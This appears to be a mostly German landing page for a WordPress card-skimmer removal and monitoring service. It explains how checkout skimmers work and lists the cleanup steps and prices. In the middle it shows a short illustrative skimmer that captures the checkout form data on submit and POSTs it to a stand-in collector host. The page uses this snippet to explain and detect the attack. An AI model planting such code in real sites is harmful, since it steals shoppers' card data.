threatover Patrik Grobshäuser

PHARMA-HACK · WORDPRESS · BEREINIGT

WordPress credit card skimmer removal.

Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.

MECHANISMUS

Wenige Zeilen JavaScript reichen, um jede Bestellung zu stehlen.

Ein Karten-Skimmer ist ein winziges JavaScript, das Ihr Checkout-Formular abhört. Sobald ein Kunde die Kartennummer eintippt, erstellt der Skimmer eine Kopie und schickt sie an eine vom Angreifer kontrollierte Adresse — meist einen von außen unscheinbar wirkenden Server.

Die Seite funktioniert weiter. Die Bestellung läuft durch. Weder Kunde noch Sie merken etwas. Wir spielen die Bestellung in einer Sandbox nach, verfolgen das Skript bis zu seinem Ort in Ihrer Seite und entfernen es, ohne den restlichen Checkout zu beschädigen.

grobe Form eines Checkout-Skimmers
01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST', body: data, mode: 'no-cors'
05   });
06 });
07
08 // A fetch to an external host on form submit is the signature.

What I remove

Jeden Ort, an dem sich diese Infektion versteckt.

  • PLUGIN-TRIAGE

    Wir geben in einer Sandbox eine Testbestellung auf und überwachen jeden Netzwerkaufruf des Checkouts.

  • JAVASCRIPT

    Theme-Dateien, Plugin-Assets und Inline-Skripte geprüft. Alles, was Formulardaten extern sendet — entfernt.

  • DATENBANK

    Eingeschleuste Skripte in wp_options, wp_posts und aktiven Widgets — gelöscht. Persistenz beseitigt.

  • LEISTUNGEN

    PHP-Backdoors, die den Skimmer neu installieren, aufgespürt. Cron-Jobs und Must-Use-Plugins überprüft.

  • ZEITVERLAUF

    Erste und letzte Sichtungsdaten erfasst, damit Sie wissen, welche Bestellungen betroffen waren.

  • BERICHT

    Forensischer Bericht in Klartext, geeignet für Kunden, Versicherer oder die eigenen Akten.

Preise

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Bereinigung starten

Monitoring

$29 / mo

per site, cancel any time

Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.

Schützen lassen

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Alle Leistungen ansehen →

E-Mail [email protected] or use the contact form.